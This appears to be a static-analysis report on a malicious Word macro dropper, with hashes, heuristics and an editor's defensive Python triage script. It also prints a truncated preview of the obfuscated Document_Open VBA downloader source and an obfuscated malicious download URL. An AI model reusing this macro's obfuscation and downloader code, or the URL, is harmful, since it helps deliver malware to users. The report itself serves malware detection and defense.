Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f73123b71be81eb…

MALICIOUS

Office (OLE)

Size: 145.0 KB
Created: 2018-04-25 06:54:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: c580bf6ef222b04902780f7db09b51ef
SHA-1: 2a5846c0ddde08b52571c4cafabbe1f7e7f29793
SHA-256: 3f73123b71be81eb666247aaee7f7fb33ffc0160f29c586623067044b6521bb0
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample is a Word document (OLE container) carrying a Document_Open VBA macro, so the code runs as soon as a user opens the file with macros enabled. The macro is heavily obfuscated: every routine is padded with junk arithmetic on undeclared variables (the On Error Resume Next in the entry point suppresses the run-time errors these expressions would otherwise raise), numeric arguments are written as x - x + N + x - x, and string literals are broken up with a recurring Fel+Fel token. Combined with the Shell() call, this is the standard downloader pattern: assemble a command string at run time and execute it to fetch and run a second-stage payload. The URL extracted from the OLE body contains the same Fel+Fel token, so it is the obfuscated form; strip the token before using it as an indicator or pivoting on it. The ClamAV signature (Doc.Dropper.Agent-6517473-0) agrees with this assessment.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6517473-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6517473-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://eventFel+FeljubileeFel+Fel.com/SzFel+Felt6Fel+FeltZ/@Fel+Felh (in document text, OLE body; contains the macro's Fel+Fel filler token, so it is the obfuscated form)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; standard DrawingML XML namespace, not an indicator)
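As an added triage example (not part of this report or of the scanner that produced it), the script below applies the checks the heuristics above encode to lines copied from the macro preview on this page: it finds the auto-exec entry point, flags process-execution primitives, folds the x - x + N + x - x arithmetic that hides the numeric arguments to CjjjC, extracts URLs, and strips the Fel+Fel token from them. Assumptions the editor made: that Fel+Fel is a pure filler token (it recurs in the macro's string literals and in the extracted URL, and removing it leaves a well-formed hostname), that the one Shell line in the sample is a constructed stand-in for the call the report flags beyond the truncated preview, and that the allowlist of XML-namespace hosts is the editor's own. The script does not decode the CjjjC calls, whose semantics are not shown in the preview.

```python
import re
from urllib.parse import urlparse

# Constructed sample: lines copied from the macro preview on this page (the real
# macros.bas is 37,979 bytes) plus one stand-in Shell() line at the end, because
# the Shell() call the report flags lies past the truncated preview.
SAMPLE_MACRO = r'''Attribute VB_Name = "ksMhXPWSOu"
Private Sub Document_open()
On Error Resume Next
znFMSjiH (YdVaUj + hFOAjKA + fupbI)
End Sub
Function hFOAjKA()
On Error Resume Next
OfDwu = CjjjC("YFel+FelNSFel+FelB =Fel+Fel pDQnsF'+'el+FelaFel+FeldaFel+FelsdFel+Felv6WPW2", LGAUzh - LGAUzh + 2 + LGAUzh - LGAUzh, LGAUzh - LGAUzh + 68 + LGAUzh - LGAUzh)
ZGiiivOooN = CjjjC("iNwdkSFel+Fel1Fel+Fel+2LFel+Fel1U,z", bGpBsC - bGpBsC + 7 + bGpBsC - bGpBsC, bGpBsC - bGpBsC + 26 + bGpBsC - bGpBsC)
YMCHtv = CjjjC("2z.TCFeqIz%l", CZbbRS - CZbbRS + 5 + CZbbRS - CZbbRS, CZbbRS - CZbbRS + 3 + CZbbRS - CZbbRS)
End Function
Sub placeholderRunner(cmd)
Shell cmd, 0 ' stand-in line constructed for this example, not copied from the sample
End Sub
'''

# The two URLs the report lists under EMBEDDED_URL, copied verbatim.
REPORT_URLS = [
    "http://eventFel+FeljubileeFel+Fel.com/SzFel+Felt6Fel+FeltZ/@Fel+Felh",
    "http://schemas.openxmlformats.org/drawingml/2006/main",
]

# Assumption: the junk token spliced into string literals and into the URL.
FILLER = "Fel+Fel"

AUTO_EXEC = re.compile(r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b", re.I)
EXEC_PRIMS = re.compile(r"\b(Shell|CreateObject|GetObject|ShellExecute|WScript\.Shell)\b", re.I)
# `x - x + N + x - x`: VBA evaluates left to right, so only N survives.
JUNK_ARITH = re.compile(r"\b(\w+) - \1 \+ (\d+) \+ \1 - \1\b")
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")
# Editor's allowlist: hosts that appear in every OOXML/DrawingML file as XML namespaces.
BENIGN_NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}


def fold_arithmetic(src: str) -> str:
    """Replace each `x - x + N + x - x` expression with the constant N."""
    return JUNK_ARITH.sub(r"\2", src)


def strip_filler(s: str, token: str = FILLER) -> str:
    """Remove the filler token; on the report's URL this yields a valid hostname."""
    return s.replace(token, "")


def is_benign_namespace(url: str) -> bool:
    """True for standard XML-namespace URLs that are not indicators of compromise."""
    return urlparse(url).hostname in BENIGN_NAMESPACE_HOSTS


def triage(src: str, body_urls=()) -> dict:
    """Run the Document_Open / Shell / URL checks over VBA source plus carved URLs."""
    folded = fold_arithmetic(src)
    literals = [strip_filler(m) for m in re.findall(r'"([^"\n]*)"', folded)]
    urls = set(URL_RE.findall(src)) | set(body_urls)
    candidates = [strip_filler(u) for u in urls if not is_benign_namespace(strip_filler(u))]
    return {
        "auto_exec": sorted({m.group(1) for m in AUTO_EXEC.finditer(src)}),
        "exec_primitives": sorted({m.group(1) for m in EXEC_PRIMS.finditer(src)}),
        "folded_source": folded,
        "string_literals": literals,
        "ioc_candidates": sorted(candidates),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_MACRO, REPORT_URLS)
    for key in ("auto_exec", "exec_primitives", "string_literals", "ioc_candidates"):
        print(f"{key}: {result[key]}")
```

The folded source makes the CjjjC calls readable as CjjjC("...", 2, 68) and so on, which is the form to carry into a debugger or an emulator when the full artifact is available; the ioc_candidates list is what belongs in a blocklist, not the Fel+Fel-laden string the scanner carved.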

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 37979 bytes
SHA-256: 63ca706bf0cae13647dc43ad57753917381a7c98ade43676eaf24099e5a63563
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ksMhXPWSOu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub hvXDs(jZoZiP)
oBcqj = 11982 * aDzNrf + 55942 * ChrB(96930 * Rnd(99356) - 20736 + ojqfmz) - 22981 - Rnd(miUnWm) + 73287 - mKNIz * 58173 * Chr(aiwJM)
End Sub
Sub Ciadh(fTJPci)
TwFPc = 51840 * KqomC + 86304 * ChrB(20058 * Rnd(29642) - 29770 + qqzQj) - 536 - Rnd(KptGBd) + 90457 - dzKWVO * 36813 * Chr(GCMtob)
jQDIYm = 59869 * kzLFnh + 98111 * ChrB(17532 * Rnd(25131) - 87118 + YvAtu) - 73566 - Rnd(HtOWG) + 12112 - AJqzUW * 96561 * Chr(LZYJJf)
HtzAm = 5799 * jWJWBi + 72683 * ChrB(44860 * Rnd(26141) - 83379 + WnYIL) - 85124 - Rnd(DZjaU) + 71154 - rGlUXF * 37974 * Chr(IaTowU)
End Sub
Sub MoMhE(scziHd)
dIJCYt = 19687 * zCqll + 80463 * ChrB(59406 * Rnd(96209) - 78250 + tDkMv) - 26618 - Rnd(jpzimm) + 31117 - kCzRRP * 9855 * Chr(vMlWv)
zNiKK = 25945 * zQMvOr + 7617 * ChrB(20457 * Rnd(87747) - 25148 + aIBnf) - 63371 - Rnd(Hotoz) + 19388 - rOrmAc * 52971 * Chr(CllmV)
End Sub
Private Sub Document_open()
On Error Resume Next
YBzBz = 40092 * nRKizn + 6165 * ChrB(47857 * Rnd(63848) - 20113 + CDXdM) - 46669 - Rnd(kpXGPB) + 85549 - Ujntn * 99579 * Chr(vEwhEC)
znFMSjiH (YdVaUj + hFOAjKA + fupbI)
fYjBJ = 79895 * STlnXR + 26280 * ChrB(15412 * Rnd(35173) - 63267 + TrvQtl) - 78586 - Rnd(ItpowS) + 59830 - JWYuYO * 31454 * Chr(EshDD)
End Sub
Sub KNNKH(UOfvN)
jtdfnU = 85029 * ElumGF + 51313 * ChrB(46513 * Rnd(23803) - 2238 + lcmjb) - 50688 - Rnd(LOQurc) + 64375 - hXtYFN * 21745 * Chr(RYTbE)
qvCir = 53338 * uJBFzI + 57867 * ChrB(31569 * Rnd(18603) - 87594 + EKXDi) - 76139 - Rnd(qaGUKI) + 97507 - JXUrNk * 11044 * Chr(nNsTFE)
GIfBWt = 59126 * RPiBBt + 49687 * ChrB(99694 * Rnd(85318) - 12587 + zGvRj) - 62737 - Rnd(PjqlUq) + 73304 - AMiHbq * 59564 * Chr(CcfjEB)
End Sub
Sub NAMqE(KqzVXi)
wfusPI = 87661 * VliZU + 41070 * ChrB(86351 * Rnd(78652) - 1302 + vNVclH) - 99903 - Rnd(RpVfmE) + 22965 - oXhnTv * 16047 * Chr(sPiQk)
End Sub
Sub RBwXc(ZUuns)
qDrpza = 26577 * hVGNdz + 9657 * ChrB(42043 * Rnd(69770) - 42784 + jwMYU) - 63037 - Rnd(bvKUc) + 88484 - lEEICQ * 15435 * Chr(AYvul)
cLDjYP = 16477 * ifXIkw + 35888 * ChrB(49174 * Rnd(25447) - 87301 + SsvAN) - 64413 - Rnd(Qhwnc) + 48849 - UzjHkE * 59223 * Chr(zZYktf)
End Sub

Attribute VB_Name = "jaLChSBj"
Sub pCSwb(qDwNPz)
Sdpijt = 42760 * dnaHzV + 55386 * ChrB(50836 * Rnd(84081) - 55579 + SYRhm) - 62003 - Rnd(JiVlj) + 30039 - AIiMz * 74255 * Chr(KjMOr)
End Sub
Function hFOAjKA()
On Error Resume Next
KSVijC = 4552 * GjYEw + 14072 * ChrB(54340 * Rnd(61853) - 30954 + cTENQL) - 26101 - Rnd(tbhQJi) + 19358 - hbITKp * 6525 * Chr(zMrnW)
OfDwu = CjjjC("YFel+FelNSFel+FelB =Fel+Fel pDQnsF'+'el+FelaFel+FeldaFel+FelsdFel+Felv6WPW2", LGAUzh - LGAUzh + 2 + LGAUzh - LGAUzh, LGAUzh - LGAUzh + 68 + LGAUzh - LGAUzh)
cwfinB = 62245 * CJQvIb + 75850 * ChrB(81156 * Rnd(43547) - 80246 + TZAXwU) - 75139 - Rnd(pQDTa) + 28718 - wilfv * 16439 * Chr(kZwCPj)
zPSkz = 33389 * WQnrHQ + 20513 * ChrB(53157 * Rnd(66617) - 5449 + GPRBY) - 56241 - Rnd(rjDPPu) + 49119 - cHqLc * 3018 * Chr(EidKkO)
ZGiiivOooN = CjjjC("iNwdkSFel+Fel1Fel+Fel+2LFel+Fel1U,z", bGpBsC - bGpBsC + 7 + bGpBsC - bGpBsC, bGpBsC - bGpBsC + 26 + bGpBsC - bGpBsC)
NjkXi = 82476 * EwrpCH + 64994 * ChrB(60082 * Rnd(12459) - 2959 + RGoDkX) - 50983 - Rnd(WKiYN) + 85591 - XVWir * 22991 * Chr(PXJzWZ)
jVDPK = 28228 * LRdUHf + 22420 * ChrB(81239 * Rnd(87883) - 56258 + PEzKNw) - 75111 - Rnd(pCQRp) + 67442 - ABONzG * 92705 * Chr(lVWVHz)
YMCHtv = CjjjC("2z.TCFeqIz%l", CZbbRS - CZbbRS + 5 + CZbbRS - CZbbRS, CZbbRS - CZbbRS + 3 + CZbbRS - CZbbRS)
jfOGS = 12604 * YHEbE + 48640 * ChrB(47575 * Rnd(90109) - 108 + lRfKcf) - 56368 - Rnd(TSLpqd) + 60887 - TVkCi * 32403 * Chr(jdGJXB)
jodhfu = 79203 * hciYih + 15289 * ChrB(72103 * Rnd(70038) - 31014 + mfhzV) - 2312 - Rnd(XHslO) + 36798 - qDoCwX * 77744 * Chr(TbGXfR)
OGjiwA = CjjjC("Tb SyFel+Felstem.NFel+Felet.Fel+FelWebFel+Fels4
... (truncated)